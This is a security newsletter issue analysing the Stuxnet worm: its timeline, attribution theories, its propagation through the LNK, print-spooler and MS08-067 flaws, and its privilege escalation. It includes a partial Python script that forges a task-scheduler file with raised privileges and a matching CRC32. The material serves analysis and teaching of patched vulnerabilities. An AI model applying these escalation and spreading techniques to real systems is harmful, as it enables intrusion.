Stuxnet. analysis, myths, realities

ACTUSÉCU 27 (XMCO)
Photo: David Helan

STUXNET: ANALYSIS, MYTHS AND REALITIES

CONTENTS
- Stuxnet: complete two-part article on THE virus of 2010
- Keyboard Layout: analysis of the MS10-073 vulnerability used by Stuxnet
- Current news: Top 10 hacking techniques, zero-day IE, GS Days 2010, ProFTPD...
- Blogs, software and our favorite Tweets...

This document is the property of XMCO Partners. Any reproduction is strictly prohibited.
Are you concerned by IT security in your company?

XMCO Partners is a consultancy whose business is IT security audits.

Services:
- Intrusion tests: our experts in intrusion can test your networks, systems and web applications, using the OWASP, OSSTMM and CCWAPSS methodologies.
- Security audit: technical and organizational audit of the security of your Information System, against best practices such as ISO 27001, PCI DSS and Sarbanes-Oxley.
- PCI DSS support: consulting and auditing for environments requiring PCI DSS Level 1 and 2 certification.
- CERT-XMCO, vulnerability monitoring: personalized monitoring of vulnerabilities and of the fixes affecting your Information System.
- CERT-XMCO, response to intrusion: detection and diagnosis of intrusion, collection of evidence, log examination, malware autopsy.

About XMCO Partners: founded in 2002 by experts in security and managed by its founders, we work in the form of fixed-fee projects with a commitment to achieve results. Intrusion tests, security audits and vulnerability monitoring are the major areas in which our firm is developing. At the same time, we work with senior management on assignments providing support to heads of information-systems security, in drawing up master plans and in working on awareness-raising seminars with several large French accounts.

To contact XMCO Partners and discover our services: WWW.XMCO.FR
FEB. 2011 - EDITORIAL - ACTUSÉCU NUMBER 27

We wish you a happy 2011…

This is the first issue of ActuSécu in 2011. As usual, a very busy year end made us a little late in writing this issue.

The XMCO team is strengthened with the arrival of Florent Hochwelker, a security consultant coming from SkyRecon. The security of the Windows kernel, DEP bypass and other tricks for happily causing memory overflows no longer hold any secrets for him. Florent has also written his first article in this issue.

What will 2011 bring us in terms of attacks and security? Without wishing to gaze into a crystal ball, it is clear, for me, that 2011 will be THE year of m-payment: contactless mobile payments (by NFC or GSM). Although these technologies are, a priori, new, they are based on existing and proven frameworks. There will certainly be implementation errors that may be exploited by pirates, especially as these are particularly ingenious when it comes to hacking means of payment.

We hope that you find this issue interesting and we look forward to seeing you at Black Hat Barcelona, for which XMCO is a partner.

Frédéric Charpentier, Chief Technology Officer

Editor in chief: Adrien GUINAULT
Contributors: Charles DAGOUAT, Florent HOCHWELKER, Stéphane JIN, François LEGUE, Frédéric CHARPENTIER, Yannick HAMON

CONTACT XMCO: actu_secu@xmco.fr, info@xmco.fr

THE XMCO AGENDA
- PCI DSS QSA TRAINING: 7 and 8 March in London
- BLACK HAT EUROPE: 16 and 17 March in Barcelona
CONTENTS

Stuxnet Part I: analysis, myths and realities ........ p. 5
An examination of THE virus of 2010

Stuxnet Part II: technical analysis .................. p. 13
Propagation, infection and attacks on industrial systems

Keyboard Layout vulnerability ........................ p. 29
Analysis of the "elevation of privileges" vulnerability used by Stuxnet (MS10-073)

Current news ......................................... p. 38
Top Ten hacking techniques, zero-day IE, GS Days, ProFTPD...

Blogs, software and extensions (bookmarks and tools) . p. 52
IMA, VMware compliance checker, Twitter and the rn_101 blog

XMCO 2011
STUXNET PART I: HISTORY, MYTHS AND REALITIES
Stuxnet, elected malware of the year

It would have been inconceivable not to devote an article to THE malware of the year 2010. Although nearly everything has already been said on this subject, we could not resist writing an article on Stuxnet several months after the media buzz has subsided. Much is still obscure concerning this malware, its origins and its developers. However, we will try to give a summary, while also taking an objective view of the various papers covering the subject.

Photo: Karsten Kneese

If there is one thing to remember about 2010, it is surely the case of Stuxnet. This malware, specifically produced to carry out the second highly-publicized targeted attack of 2010 (after Aurora), caused comment for more than six months! This article is intended as a summary of this long period, which was punctuated by many new developments. It covers the succession of discoveries and announcements that took place during this period and tries to analyze all the facts in order to draw conclusions. Between reminders on technical matters, genuine rumors and false realities, this article will appraise the situation as completely as possible.

Preliminary reminders

Stuxnet is a complex piece of malware constructed from many components, intended to sabotage the normal functioning of certain critical systems. In contrast to the somewhat indiscreet approach used to reach these sensitive systems, the sabotage itself is intended to be very discreet.

To approach its target, Stuxnet exploits at least four zero-day vulnerabilities (all since corrected by Microsoft) targeting different versions of Windows, as well as the famous MS08-067 vulnerability, which was corrected in 2008. To quickly reach its target, the malware also uses a password defined by default within certain SCADA (Supervisory Control And Data Acquisition) systems based on the Siemens SIMATIC WinCC software.

Thanks to all the work performed by the various researchers with an interest in malware, the role of Stuxnet has been clarified. The malicious code acts in several stages. Firstly, a removable storage medium is used to compromise a system on a local network. Once present on a network, the malware replicates, moving towards the discovery of a point of access to its target: a system on which WinCC is installed. Secondly, when such a target is discovered, the behavior of the various components controlling the target architecture is modified in order to physically impair the integrity of the industrial production system. In the case of Stuxnet, this means modifying the normal function of certain critical systems by manipulating their controllers.
History

It is difficult to create a comprehensive history of the events relating to Stuxnet because of the numerous new developments and announcements during this long period. Limiting ourselves to the dates of the discoveries made and publicized by the researchers would not really make sense. It is necessary to consider the period before the media took an interest in this subject, as this attack is so complex. We are therefore going to try, with hindsight, to trace a history that takes into account the dates before the beginning of the media interest in this sabotage campaign. It also takes into account the discoveries made after this attack attracted media interest.

From Stuxnet

Everything officially began on 17 June 2010, when the Belarusian company VirusBlokAda published a report on the virus Rootkit.TmpHider, mentioning the LNK vulnerability. This vulnerability, which was a zero-day in June 2010, allows a pirate to execute code when a directory is opened, whether it is shared (SMB, WebDAV), local or on a mass-storage peripheral (external hard disk, USB drive, portable telephone, MP3 player, etc.). The vulnerability gradually began to arouse comment. MITRE assigned it the reference CVE-2010-2568 on 30 June, and on 13 July Symantec added detection of this virus under the name W32.Temphid.

The next day, on 14 July, MITRE assigned references CVE-2010-2729 and CVE-2010-2743 to security vulnerabilities present in the print spooler and in the keyboard layout management. Two days afterwards, on 16 July, Microsoft published a security advisory referenced 2286198 (KB2286198). This concerned the security vulnerability exploited by the malware: the handling of LNK files was then clearly identified as problematic by the software publisher. At the same time, VeriSign revoked the certificate belonging to Realtek Semiconductor Corp., because it had been used by pirates to sign certain drivers used by their malware. Symantec subsequently revealed that the first malware identified as coming from the Stuxnet family and carrying a driver signed with this certificate went back to January 2010.

On 17 July, the antivirus publisher ESET detected new malware from the Stuxnet family. This one used a certificate belonging to JMicron Technology Corp. to sign one of its components. On 19 July, a year after Ivanlef0u had published a proof of concept, the researcher HD Moore published exploitation code within the Metasploit framework. This allowed control of a system to be taken over remotely by exploiting the vulnerability through a WebDAV share: a pirate simply had to encourage an Internet user to visit a web page with Internet Explorer to take control of the underlying system. The same day, Symantec renamed W32.Temphid to W32.Stuxnet, and Siemens reported that the company was studying reports referring to the compromise of several SCADA systems linked to WinCC.

On 20 July, Symantec announced that it had discovered how the malware communicated with its command and control (C&C) servers, and the meaning of the exchanged messages. On 21 July, MITRE assigned reference CVE-2010-2772 to the security vulnerability present within the Simatic WinCC and PCS 7 software from Siemens: a password had been hard-coded and could be used to access certain components of the Siemens applications with elevated privileges. Two days afterwards, on 23 July, VeriSign revoked the certificate belonging to JMicron Technology Corp.

Then several days passed, during which the researchers and specialists involved in this study certainly did not stop working. On 2 August, outside its "Patch Tuesday" cycle, Microsoft published its security bulletin MS10-046 proposing several patches for the LNK vulnerability. On 6 August, Symantec presented the method used by Stuxnet to inject and hide code on a PLC (Programmable Logic Controller).

On 14 September, Microsoft published a new security bulletin (MS10-061) and offered a patch for the vulnerability in the print spooler that Symantec had reported in August. The same day, MITRE assigned reference CVE-2010-3338 to the "elevation of privileges" vulnerability identified within the task scheduler. Just a few days afterwards, on 17 September, Joshua J. Drake (jduck1337) published exploitation code within the Metasploit framework, allowing control of a system to be taken via the vulnerability in the Windows print spooler. Lastly, to end the month of September, the publishers of the antivirus solutions ESET and Symantec published, on 30 September, a first version of their reports presenting their almost-complete analyses of the malware. Neither publisher wished to disclose information on vulnerabilities that had not yet been corrected by Microsoft.

On its "Patch Tuesday" of 12 October, Microsoft published its security bulletin MS10-073, which gave a patch for the vulnerability related to keyboard layout management. On 20 November, Joshua J. Drake published new exploitation code within the Metasploit framework for the vulnerability in the Windows task scheduler. Finally, after two months of waiting, on its "Patch Tuesday" of 14 December, Microsoft published its security bulletin MS10-092, correcting the task scheduler vulnerability and thereby closing the last of the security vulnerabilities exploited by Stuxnet.

The progress made by Ralph Langner

Thanks to the work done by the German researcher Ralph Langner, which began as soon as the media started to take an interest in the malware, it has been possible to identify numerous trails related to the origin of Stuxnet, to its potential targets and to the people hiding behind this attack. Of course, all information published by this former psychologist should be treated with caution. Even so, it appears, with hindsight, that many of the opinions he gave have subsequently been validated by other researchers (such as Symantec) or by documents from third-party sources.

On 16 September, Langner announced that Iran, and particularly the nuclear power station at Bushehr, which was built in cooperation with Russia, was the main target. The researcher was also the first to speak of cyber war. In the days that followed, he published new hypotheses and new discoveries almost daily. The researcher approached numerous entities, such as Congress, the DHS and the INL in the United States, and also appeared on television. On 13 November, Langner announced, just after Symantec, that he had come to the same conclusions concerning the malicious code 315 and the PLCs targeted. He took the opportunity to present the K-1000-60/3000-3 steam turbines made by the Russian manufacturer "Power Machines" which, according to him, equipped the Bushehr nuclear plant. The following day, he presented his analysis of the entity that probably ordered this attack: for him, only a government could have been involved in such a scenario. The complexity of the knowledge required, the human and material resources required and, lastly, the cost of such an organization make certain countries ideal suspects. On the list drawn up by the researcher were Israel, the United States, Germany and Russia.

Photo: Trey Ratcliff

On 15 November, Langner presented a technical scenario by which the malicious code 315 could destroy gas centrifuges. He was then supported by the nuclear specialist David Albright from ISIS (Institute for Science and International Security). On the same day, a second announcement gave the details of the attack performed by the code 417. In the days that followed, numerous details of this second attack were presented and a hypothesis concerning the targets was given: according to the researcher, the code 315 targeted the IR-1 centrifuges present in the Natanz enrichment centre, while module 417 targeted the steam turbines in the electrical power station at Bushehr. A single weapon, the malware, which contained two payloads, the code modules 315 and 417, targeting different PLCs.

At the end of November, the former psychologist announced that Iran and Venezuela had concluded an agreement in 2008. This alliance allowed Iran to install ballistic missiles on Venezuelan territory in exchange for
the help provided by Iran in setting up a nuclear program in the host country. A situation in which the United States would surely not be delighted to find itself; and therefore, in his opinion, a justification for the establishment of this secret program.

At the end of December, helped by the publication of the report from ISIS, which analyzed the state of the nuclear infrastructure as reported by the inspectors of the International Atomic Energy Agency (IAEA), Langner announced that he had discovered the precise target of the malware, and more precisely of block 417: the safety system associated with the cascades of centrifuges used to enrich uranium. In his opinion, both of the PLCs targeted are used in the operation of an enrichment centre such as Natanz.

Photo: Trey Ratcliff

At the beginning of January, the researcher presented a new hypothesis on the role of blocks 315 and 417. According to him, their main objective was not the destruction of the centrifuges, but rather to make these production systems massively inefficient. By analyzing the data embedded in the code, together with theoretical calculations on the yield of uranium production, the researcher found that the operations performed by the two blocks of code would drastically reduce the yield of the centrifuges.

To summarize, over the course of these few months, Langner was probably the researcher who communicated most concerning Stuxnet.

The "New York Times" theory

For the first time since the beginning of this affair, an article published by the New York Times on 16 January described a plausible scenario. Even though this scenario is based more on a correlation between events and facts than on tangible proof, its authors have the distinction of being among the first to officially name the various protagonists. It should therefore be taken with caution and is the responsibility only of the journalists who wrote the New York Times article.

In this scenario, the United States set up a plan to hinder Iran in its quest to produce nuclear weapons. According to the journalists, President Bush gave his agreement, one month before the end of his term of office in January 2009, to the establishment of a secret program aiming to sabotage the electrical and computer systems at the main uranium enrichment centre at Natanz. From the beginning of his term of office, Barack Obama, who had been informed of this before taking office, accelerated this program on the advice of those knowledgeable about the case of Iran.

Still according to the New York Times journalists, this program was based on work performed at the Idaho National Laboratory (INL) in partnership with the Department of Homeland Security (DHS) and Siemens. During 2008, they claim, Siemens asked the INL to test the security of its Step7 software, which is used to control sets of industrial systems (tools, probes, etc.) through products such as PCS7 (Process Control System 7). The results obtained, including numerous security vulnerabilities, were presented in July at a conference held in Chicago.

Several months later, American diplomacy succeeded in establishing an embargo on certain components necessary to the correct functioning of a uranium enrichment centre. According to a diplomatic cable revealed by Wikileaks, in April 2009, 111 Siemens controllers needed to control a uranium enrichment cascade were therefore blocked at the port of Dubai in the United Arab Emirates.

At the end of 2010, the Institute for Science and International Security (ISIS) reported that, according to the IAEA inspectors, 984 defective centrifuges had been replaced at the end of 2009. Strangely, this figure corresponds exactly to the number of devices that the Stuxnet code expects to find in the enrichment cascades it targets. Nevertheless, what is the relationship between these 984 replaced centrifuges and Stuxnet? They were replaced between the end of 2009 and the beginning of 2010, while Stuxnet made its first public appearance, still unidentified, at the beginning of 2010.

The article presents Israel as the principal ally of the United States in manufacturing and testing this malware. This "small" country, which is highly advanced technologically, and particularly in cyber-warfare, is alleged to have built a replica of the Natanz enrichment centre in its own nuclear research centre at Dimona. The journalists gave two reasons for this alliance. Among the Americans' other allies, none would be able to make the IR-1 centrifuges work properly. These were derived from the Pakistani P-1, themselves copied from plans of the German G-1 stolen by the physicist Abdul Qadeer Khan (father of the Pakistani nuclear bomb and head of a network specialized in the sale of nuclear material that helped spread sensitive technology to Iran, North Korea and Libya). The second reason was that Israel had long been openly seeking to prevent Iran from obtaining nuclear weapons.

According to the authors of this article, other information reveals the magnitude of this American program. Massoud Ali Mohammadi, an Iranian nuclear specialist, was killed in January 2010 by an explosion caused by a remotely-triggered bomb fixed to a motorbike. On 29 November 2010, when Iran recognized for the first time that Natanz had suffered damage related to Stuxnet, a second physicist, Majid Shahriari, was the victim of a second fatal "accident". On both occasions, President Mahmoud Ahmadinejad directly accused the United States and Israel of having ordered these assassinations. After this second suspect event, the Iranians took the decision to "hide" Mohsen Fakhrizadeh, the third (and last?) nuclear specialist.

Photo: Ludo Benoit

Forbes' counter theory

Another article, published by journalists at Forbes the following day, strongly criticized this analysis. According to them, it was based on no tangible proof: only gestures made by certain diplomats at press conferences and the content of several diplomatic cables revealed by Wikileaks gave any support to the journalists' article.

The Forbes journalists took advantage of trashing this theory to push their own analysis, published in December. According to them, the "real" powers behind Stuxnet were Finland and China. The reasoning was that Vacon, the Finnish manufacturer of frequency converters (variable frequency drives), had a manufacturing plant in China, which would mean that China knew precisely which frequency converter models to target. Furthermore, China is suspected of having access to part of the source code of Windows, which could explain the discovery and use of four zero-day vulnerabilities.

Numerous other details linking China and Finland were also put forward by the journalists to support their theory. For example, Realtek Semiconductor, the Taiwanese company whose certificate was stolen to sign the drivers, has a site in the industrial zone of Suzhou, in China, not far from Vacon. Finally, China was relatively untouched by the worm.

Lastly, very many international experts criticized the quality of the code in the malware. Several commentators pointed to the amateurism of certain functionalities of Stuxnet: the very basic component that communicates with the C&C servers (for example, no encryption of communications, the lack of robustness of the control servers, etc.), the absence of additional protection (polymorphism, anti-debugging and robust encryption), and finally an indiscreet means of proliferation unworthy of an attack carried out discreetly by the military. According to these commentators, these observations alone are evidence that no government is hiding behind Stuxnet.

The other factors to be remembered

On 9 July 2010, the Indian satellite INSAT-4B was declared inoperable. This satellite, which was used for telecommunications, television broadcasting, meteorology and individual search and rescue, was controlled by a SCADA system based on Siemens S7-400 PLCs and SIMATIC WinCC. This announcement occurred during a complex period in relations between India and China, because the two countries are fiercely competing in the aerospace sector to be the first Asian country to put a man on the moon.

Although Symantec and other publishers of anti-virus software named Iran as the main victim of Stuxnet, it was not before mid-October that the subject of Stuxnet was publicly mentioned by Iran. In this first speech, the Iranian president simply denied the damage that the worm was supposed to have caused to national infrastructure. A month later, in November, the country recognized for the first time that it had suffered "slight" problems leading to the postponement of the launch of the Bushehr plant. In reaction to this attack, the government arrested some Russian service contractors suspected of being spies; they were subsequently released.

Since the beginning of 2011, numerous other events have been added to this story. Symantec, by recovering samples obtained from the various publishers of antivirus software on the market, was able to make a statistical study of the attacks. Thanks to the 3,280 samples recovered from ESET, F-Secure, Kaspersky, Microsoft, McAfee and Trend Micro, Symantec was able to draw the following conclusions:
- exactly five organizations were targeted, and all five are present in Iran;
- most of the 12,000 infections corresponding to the 3,280 samples can be traced back to these organizations;
- among the victims used as vectors for propagation, three were attacked once, one was targeted twice and one was attacked three times;
- these attacks took place on very precise dates: in June 2009, one month later in July 2009, then at three further stages in March, April and May 2010;
- lastly, three variants of the malware, corresponding to the attacks that took place in June 2009, April 2010 and May 2010, were observed. The existence of a fourth variant is assumed but has not been observed among the samples obtained.

Photo: Ludo Benoit

According to Symantec, these five companies are suppliers with links to the Natanz enrichment centre. From these samples Symantec was able to produce graphs representing the proliferation of the malware. For this, the researchers used the information (date and time, for example) recorded by the malware each time it infects a new system. These graphs clearly highlight the five dates corresponding to the attacks and the number of targets initially contaminated during each of these events.

The day after this announcement, several media echoed another announcement that was particularly surprising. In a video shown at a party given in honor of the retirement of General Gabi Ashkenazi, and reported by the newspaper Haaretz, it was claimed that the newly-retired general had supervised the creation of Stuxnet. Nevertheless, as no official Israeli source has corroborated this announcement, it must be taken with caution.

The warning signs

The Stuxnet affair began well before 2010. Symantec was able to find traces of the malware going back to 2008. On 20 November 2008, Symantec observed the exploitation of the LNK vulnerability for the first time. This had not been analyzed at the time, and we had to wait for the appearance of Stuxnet to discover that pirates had known about this vulnerability for more than two years. The virus in question was then identified as "Trojan.Zlob" and does not appear to be related to Stuxnet.

In April 2009, the researcher Carsten Köhler published an article in the magazine Hakin9 presenting a security vulnerability within the Windows print spooler. No one reacted, not even Microsoft, which was clearly concerned! Several months later, in June 2009, Symantec detected a new malware that is now identified as the first version of Stuxnet. It was very simple and did not carry all of the payloads that we know today. According to Symantec, it was in January 2010 that the first malware in the Stuxnet family appeared using the certificate from Realtek Semiconductor Corp. to sign one of its components. Lastly, it was in March 2010 that the first malware in the Stuxnet family appeared that exploited the LNK vulnerability.

Conclusion

Stuxnet has caused a lot of comment and been highly publicized. The various theories, analyses and hypotheses made until now do not allow any conclusions to be drawn with certainty, either concerning those who ordered the attacks or the targets. However, according to the various discoveries made by several researchers and journalists (Symantec, Langner and the New York Times), Iran seems to have been targeted, especially the nuclear enrichment centre at Natanz. Concerning those who ordered the attack, and bearing in mind its complexity, the resources used and the different information revealed by the journalists, Israel and the USA appear to have played a role in this affair. We must also bear in mind that all of the information revealed by the various observers is always subjective…
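The statistical study described above rests on one property of the worm that the article mentions in passing: each time it infects a machine it records where and when. The script below is an added example written for this page (it is not Symantec's tooling nor XMCO's code) showing how, from such per-sample histories, an analyst recovers the initial infection points, clusters them into attack waves and counts how many times each organization was seeded. It assumes each recovered sample carries an ordered list of (infection time, computer name, domain) hops; both that layout and the six records below are constructed for the example and do not reproduce the real Stuxnet configuration block.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def d(*args):
    return datetime(*args)


# Constructed records (not real Stuxnet data): one entry per recovered sample,
# each an ordered list of (infection time, computer name, domain) hops, oldest first.
SAMPLES = [
    [(d(2009, 6, 22, 10), "WS01", "orgA"), (d(2009, 6, 22, 11), "WS07", "orgA"),
     (d(2009, 6, 25, 9), "ENG2", "orgA")],
    [(d(2009, 6, 22, 10), "WS01", "orgA"), (d(2009, 7, 1, 8), "FS1", "orgA")],
    [(d(2009, 7, 7, 12), "PC3", "orgB"), (d(2009, 7, 8, 12), "PC9", "orgB")],
    [(d(2010, 3, 1, 9), "HMI1", "orgC")],
    [(d(2010, 3, 2, 15), "LAP4", "orgA"), (d(2010, 3, 9, 10), "SRV2", "orgA")],
    [(d(2010, 4, 14, 11), "PC12", "orgB"), (d(2010, 4, 20, 11), "PC13", "orgB"),
     (d(2010, 5, 3, 8), "CAD1", "orgD")],
]


def initial_infections(samples):
    """First hop of every chain: the machine that brought the worm in, with its earliest time."""
    roots = {}
    for chain in samples:
        ts, host, domain = chain[0]
        key = (host, domain)
        if key not in roots or ts < roots[key]:
            roots[key] = ts
    return roots


def infection_edges(samples):
    """Parent -> child edges with the child's infection time (earliest observation wins)."""
    edges = {}
    for chain in samples:
        for (_, phost, pdom), (cts, chost, cdom) in zip(chain, chain[1:]):
            key = ((phost, pdom), (chost, cdom))
            if key not in edges or cts < edges[key]:
                edges[key] = cts
    return edges


def attack_waves(roots, gap=timedelta(days=14)):
    """Cluster initial infections into waves: a new wave starts after a silence longer than `gap`."""
    waves = []
    for ts, key in sorted((ts, key) for key, ts in roots.items()):
        if waves and ts - waves[-1]["end"] <= gap:
            waves[-1]["end"] = ts
            waves[-1]["targets"].add(key)
        else:
            waves.append({"start": ts, "end": ts, "targets": {key}})
    for wave in waves:
        wave["organizations"] = sorted({domain for _, domain in wave["targets"]})
    return waves


def hits_per_organization(waves):
    """How many distinct waves each organization was seeded in."""
    counts = defaultdict(int)
    for wave in waves:
        for domain in wave["organizations"]:
            counts[domain] += 1
    return dict(counts)


def organizations_reached_only_by_spread(samples):
    """Domains that appear only downstream of an edge, i.e. never as an initial target."""
    seeded = {domain for _, domain in initial_infections(samples)}
    reached = {cdom for (_, (_, cdom)) in infection_edges(samples)}
    return sorted(reached - seeded)


if __name__ == "__main__":
    waves = attack_waves(initial_infections(SAMPLES))
    for w in waves:
        print(w["start"].date(), len(w["targets"]), "initial target(s)", w["organizations"])
    print(hits_per_organization(waves))
    print(organizations_reached_only_by_spread(SAMPLES))
```

The 14-day gap is an assumption chosen so that the constructed June and July 2009 seedings fall into separate waves, as they do in Symantec's timeline; on real data the threshold should be set by looking at the distribution of first-seen times rather than fixed in advance.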
References

Resources on Stuxnet

F-Secure (FAQ):
http://www.f-secure.com/weblog/archives/00002040.html
http://www.f-secure.com/weblog/archives/00002066.html

"Timeline", CERT-IST:
http://www.cert-ist.com/fra/ressources/Publications_ArticlesBulletins/VersVirusetAntivirus/stuxnet/

New York Times

Forbes
STUXNET PART II: TECHNICAL ANALYSIS
Stuxnet, elected malware of the year

After having looked at the history of Stuxnet and the theories and assumptions behind it, let us now look at its technical analysis. Some very good white papers (Symantec and ESET) have given a detailed presentation of the complexity of this malware. We will try to summarize everything to give an understanding of the propagation modes used, the relationships with industrial systems and the consequences that Stuxnet may cause.

Bjoern Schwarz
Charles Dagouat

General functioning

Stuxnet is a complex piece of malware. Its functioning mode revolves around two main "functions": the propagation of the virus, which relies on vulnerabilities in the Windows platform, and the attack on SCADA systems, which is focused on WinCC and PCS7.

This second function corresponds to the payload transported by the malware. It targets the software component WinCC. WinCC is a very widespread tool for remote monitoring and data acquisition developed by Siemens. Installed on a Windows system, it is used to control an automatic system such as a Programmable Logic Controller (PLC). This type of architecture is particularly common in critical infrastructure such as is found in industry.

To fulfil its task, Stuxnet's functioning is governed by a very specific scenario. The architecture of the malware is built around several main functionalities that correspond to the different stages in the attack process.

The first stage is not characteristic of Stuxnet, but corresponds to the majority of worms: it is the propagation phase. During this phase, the malware seeks to spread within a given area: the local network.

The second phase corresponds to the attack itself: this is the search for a target. In the case of Stuxnet, the target is a Siemens WinCC control and monitoring system linked to certain PLCs. If such a system is detected, its behavior is then discreetly impaired.

Lastly, the final phase corresponds to the material consequence of this modification. The undetectable effect discreetly acts on the system in order to slowly destroy it.
Phase I: malware propagation

Phase I of the attack carried out by Stuxnet corresponds to the proliferation of the malware within an installed base of computers. For this, the authors of Stuxnet used no less than four zero-day vulnerabilities targeting various components of Windows. This propagation function may itself be subdivided into two parts: the first corresponds to compromising Windows systems and the second to the long-term installation of the virus on a compromised system.

The main points of entry chosen by the developers of Stuxnet to penetrate the target infrastructure are removable storage media such as USB drives and other portable hard drives. Those behind the attack are therefore mainly relying on human intervention to carry the virus from one system to another.

Main attack vector: removable storage media

The vulnerability in question is related to how the Windows operating system handles shortcuts. This type of file corresponds to the extensions ".LNK" and ".PIF". More precisely, the vulnerability relates to the way that the icon for the link is loaded. This image is normally loaded from a CPL (Windows Control Panel) file using the system function "LoadLibraryW()". In reality, a CPL file is just a DLL. By specifying the path of a malicious DLL in the "File Location Info" section of a LNK file, an attacker is therefore able to force any Windows system to execute arbitrary code simply by having the content of a directory displayed.

Exploitation of this vulnerability therefore requires nothing more than a user opening a malicious directory. Exploitation code has already been published within the Metasploit framework. With it, an attacker only needs to get a user to access a web address with Internet Explorer to take control of the remote system: in this proof of concept, the server forces the client to open a shared file using the WebDAV protocol.

A user observing the content of a USB drive infected by Stuxnet can see the following six files:
- Copy of Shortcut to.lnk
- Copy of Copy of Shortcut to.lnk
- Copy of Copy of Copy of Shortcut to.lnk
- Copy of Copy of Copy of Copy of Shortcut to.lnk
- ~WTR4141.TMP
- ~WTR4132.TMP

The various shortcuts entitled "Copy of (...) Shortcut to.lnk" correspond to different versions of Windows. These links all load the library "~WTR4141.TMP" which, in turn, loads the file "~WTR4132.TMP".

After having officially acknowledged the vulnerability by publishing the security advisory referenced KB2286198 on 16 July, Microsoft reacted quickly by publishing its bulletin MS10-046 and the associated patches on 2 August, outside its "Patch Tuesday", which was planned for eight days later, on 10 August.
Additional attack vectors: local network

However, Stuxnet does not only rely on help from users to spread. It also uses two other security flaws that can be remotely exploited within a local network. The first relates to the Microsoft print spooler, while the second targets the older vulnerability present in the server service (MS08-067).

Print spooler

This vulnerability was initially presented in the magazine Hakin9 during 2009. When a printer is shared on a system, a remote user is able to "print" (i.e. write) files into the "%System%" directory. Exploitation takes place in two phases. The first consists of depositing the files "winsta.exe" and "sysnullevnt.mof" respectively in the directories "Windows\System32" and "Windows\System32\wbem\mof".

The second phase consists of getting the script "sysnullevnt.mof" executed. This file, in MOF ("Managed Object Format"), is used to force Windows to execute the code contained in the file "winsta.exe". Execution of this script is automatic: the MOF files placed in the directory "Windows\System32\wbem\mof" are automatically compiled by "mofcomp.exe", which registers in WMI the event subscription that triggers the execution of the script.

This vulnerability was corrected by Microsoft when it published its bulletin MS10-061, which added a series of checks before allowing a document to be printed.

Server service

Lastly, Stuxnet exploits the old MS08-067 vulnerability in the server service. This vulnerability, which at the time was massively exploited by Conficker/Downadup, is used here to deposit a file in shared directories of the C$ or Admin$ type. The execution of this file is scheduled for the day following compromise, using the task scheduler. It appears that the shellcode used by the malware to carry out these two actions is relatively advanced, in contrast to that which was used by Conficker.

This vulnerability was corrected by Microsoft when it published bulletin MS08-067.

The exploitation of these various vulnerabilities allows the malware to distribute itself both on a local network and, more widely, on all systems to which users can connect removable storage media. Once installed on a Windows system, the malware has several functionalities that allow it to work as part of a network. Among these, the malware installs an RPC server that allows it to exchange various items of information with other infected systems present on the LAN.

INFO: Provision of free tools for getting rid of malware, including Stuxnet.

BitDefender and Microsoft have just made free tools available for getting rid of the most currently-fashionable malware. After publishing a tool last month for getting rid of Zeus (see CXA-2010-1211), BitDefender has just published another tool for deleting the Stuxnet malware. As a reminder, the malware was detected for the first time by a company based in Belarus (see CXA-2010-0893), following the discovery of the zero-day LNK vulnerability affecting all versions of Windows (see CXA-2010-0906).

Microsoft has just updated its "Malicious Software Removal Tool", which can now deal with the most virulent botnet currently known: Zeus/ZBot. Zeus is malware that is constantly being developed, and which mainly aims to steal banking information.

The two tools can be downloaded via the following links:
Stuxnet: index.php?app=downloads&showfile=12
Zbot: 2010/10/12/msrt-on-zbot-the-botnet-in-a-box.aspx
Phase II: installation of the malware

The long-term installation of the malware requires certain actions that involve elevated privileges. The exploitation of the vulnerabilities presented previously does not allow elevated privileges to be obtained. In order to ensure maximum dissemination, two further vulnerabilities are therefore exploited by Stuxnet in order to elevate its privileges once the system has been compromised.

These two vulnerabilities cover all existing versions of Windows. The first can locally elevate privileges on old versions of the operating system, Windows 2000 and XP, while the second performs the same operation on more recent versions of the OS: Windows Vista, 7 and 2008.

The first vulnerability relates to the way keyboard layouts are handled by the driver "Win32k.sys". An index read from a keyboard layout file (which is a DLL) is used without verification. This allows the malware to force the system's kernel to execute code controlled from user mode. This vulnerability is described in detail in the article on page 29 and was corrected by Microsoft when it published its bulletin MS10-073, which added a check to prevent the use of an index that overflows the associated table.

The second vulnerability relates to the task scheduler. The definition of a task is stored in an ordinary XML file in the directory "%SystemRoot%\system32\Tasks". Access to this directory is restricted. Even so, the XML file corresponding to a task is accessible and can be written to by the user who created it. This XML description contains, among other things, information related to the execution of the task, for example the user account and the required level of privileges. A user who defined a task can therefore freely change the user identifier and the level of privileges required, in order to elevate privileges.

To protect against this type of attack, Microsoft had introduced a "security feature" which calculates a hash of the file corresponding to a task when it is defined; this hash is checked before the task is executed. But the CRC32 algorithm used for calculating this hash is not designed for security purposes. It is too weak to fulfil this role because collisions are easy to produce: it is nothing more than a straightforward CRC of the XML file. By adding data in a comment field, it is therefore easy to produce a modified file with the same hash as the original.

Stuxnet therefore adds a task, calculates the associated CRC32 hash, "manually" modifies the file to raise the privileges associated with it, then adds a comment field and fills it with random data until the checksum matches (a collision). The task is then executed with the highest privileges.

This vulnerability was corrected by Microsoft when it published bulletin MS10-092, which changed the hash function used. The CRC32 checksum was replaced by SHA-256, which is considered secure against collision attacks.

There remains an unknown. According to Microsoft, these two vulnerabilities respectively target Windows XP and 2000 for the keyboard layout handling, and Windows Vista, 7 and 2008 for the task scheduler. It would appear that the technique used by Stuxnet to install itself on Windows Server 2003 is unknown, or that the malware has excluded this platform from its targets.

Ludo Benoit
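The following script is an added example written for this article, not code from Stuxnet or from Microsoft: it shows why a CRC32 offers no protection here. It takes a constructed task definition in the Task Scheduler XML format, raises its UserId and RunLevel as described above, then appends an XML comment whose last four bytes are computed so that the CRC32 of the modified file equals that of the original. The filler bytes are calculated directly instead of being found by random search (Stuxnet fills the comment with random data until the checksum matches). The SIDs, the placement of the comment after the root element and the single-byte encoding are assumptions of the illustration; real task files are stored in UTF-16.

```python
import zlib
import xml.etree.ElementTree as ET

# Constructed sample task definition (not a task file taken from Stuxnet).
# Real files under %SystemRoot%\system32\Tasks are UTF-16; a single-byte
# encoding is used here so the filler bytes can be checked as plain ASCII.
ORIGINAL_TASK = b"""<?xml version="1.0" encoding="UTF-8"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals>
    <Principal id="Author">
      <UserId>S-1-5-21-1004336348-1177238915-682003330-1001</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
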